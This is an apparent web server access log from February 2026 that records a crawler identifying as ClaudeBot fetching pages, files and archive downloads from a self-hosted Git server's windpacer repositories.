-[15/Feb/2026:06:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls" [Client 216.73.216.188] [Length 9923] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/packages" [Client 216.73.216.188] [Length 7407] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/actions" [Client 216.73.216.188] [Length 7412] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/compare/main...main?expand=1" [Client 216.73.216.188] [Length 8415] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/projects.sln" [Client 216.73.216.188] [Length 11918] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/releases" [Client 216.73.216.188] [Length 7425] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?language=Python&tab=repositories" [Client 216.73.216.188] [Length 7783] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/releases" [Client 216.73.216.188] [Length 7421] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues" [Client 216.73.216.188] [Length 10092] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity" [Client 216.73.216.188] [Length 8588] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?tab=stars" [Client 216.73.216.188] [Length 7154] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/docker-compose.yml" [Client 216.73.216.188] [Length 12791] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/archive/main.tar.gz" [Client 216.73.216.188] [Length 43390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main" -[15/Feb/2026:06:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?tab=following" [Client 216.73.216.188] [Length 6370] [Gzip 2.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal" [Client 216.73.216.188] [Length 10747] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook" [Client 216.73.216.188] [Length 10525] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tags" [Client 216.73.216.188] [Length 7732] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main" [Client 216.73.216.188] [Length 9995] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/find/branch/main" [Client 216.73.216.188] [Length 7472] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html" [Client 216.73.216.188] [Length 14579] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 216.73.216.188] [Length 4595] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main" -[15/Feb/2026:06:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/wiki" [Client 216.73.216.188] [Length 7370] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/branches" [Client 216.73.216.188] [Length 10356] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/watchers" [Client 216.73.216.188] [Length 7742] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/watchers" [Client 216.73.216.188] [Length 7738] [Gzip 2.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:46:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/main.bundle" [Client 216.73.216.188] [Length 12886675] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fexplore%2Forganizations" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?tab=followers" [Client 216.73.216.188] [Length 6370] [Gzip 2.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.vscode" [Client 216.73.216.188] [Length 10333] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/update_status.py" [Client 216.73.216.188] [Length 13166] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/main...main?expand=1" [Client 216.73.216.188] [Length 8410] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf" [Client 216.73.216.188] [Length 11847] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/Dockerfile" [Client 216.73.216.188] [Length 11787] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?language=HTML&tab=repositories" [Client 216.73.216.188] [Length 7763] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/main.zip" [Client 216.73.216.188] [Length 25670278] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup" [Client 216.73.216.188] [Length 11666] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b" [Client 216.73.216.188] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f" [Client 216.73.216.188] [Length 34236] [Gzip 7.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/mail_contact.py" [Client 216.73.216.188] [Length 16304] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 216.73.216.188] [Length 188109] [Gzip 11.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 216.73.216.188] [Length 400188] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:47:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/main.tar.gz" [Client 216.73.216.188] [Length 25642081] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fstars" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fforks" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fstars" [Client 216.73.216.188] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fforks" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?language=C%23&tab=repositories" [Client 216.73.216.188] [Length 7781] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fforks" [Client 216.73.216.188] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?language=Roff&tab=repositories" [Client 216.73.216.188] [Length 7777] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.gitignore" [Client 216.73.216.188] [Length 11157] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/watchers" [Client 216.73.216.188] [Length 7737] [Gzip 2.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/branch/main" [Client 216.73.216.188] [Length 7470] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main" [Client 216.73.216.188] [Length 11046] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/nginx.conf" [Client 216.73.216.188] [Length 12178] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm" [Client 216.73.216.188] [Length 10330] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?tab=repositories" [Client 216.73.216.188] [Length 8153] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/releases" [Client 216.73.216.188] [Length 7417] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" [Client 216.73.216.188] [Length 23170] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e" [Client 216.73.216.188] [Length 106856] [Gzip 12.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:48:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/branches" [Client 216.73.216.188] [Length 10344] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main" -[15/Feb/2026:06:49:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:49:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/tags" [Client 216.73.216.188] [Length 7740] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:49:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main" -[15/Feb/2026:06:49:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main" -[15/Feb/2026:06:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/archive/main.bundle" [Client 216.73.216.188] [Length 337818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:50:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/compare/main...main?expand=1" [Client 216.73.216.188] [Length 8424] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:50:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/archive/main.zip" [Client 216.73.216.188] [Length 328213] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:50:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/find/branch/main" [Client 216.73.216.188] [Length 7477] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:50:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" [Client 216.73.216.188] [Length 60692] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main" [Client 216.73.216.188] [Length 10700] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" [Client 216.73.216.188] [Length 16474] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:51:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" [Client 216.73.216.188] [Length 11629] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:51:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/archive/main.tar.gz" [Client 216.73.216.188] [Length 314442] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:06:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.gitignore" [Client 216.73.216.188] [Length 11331] [Gzip 2.98] 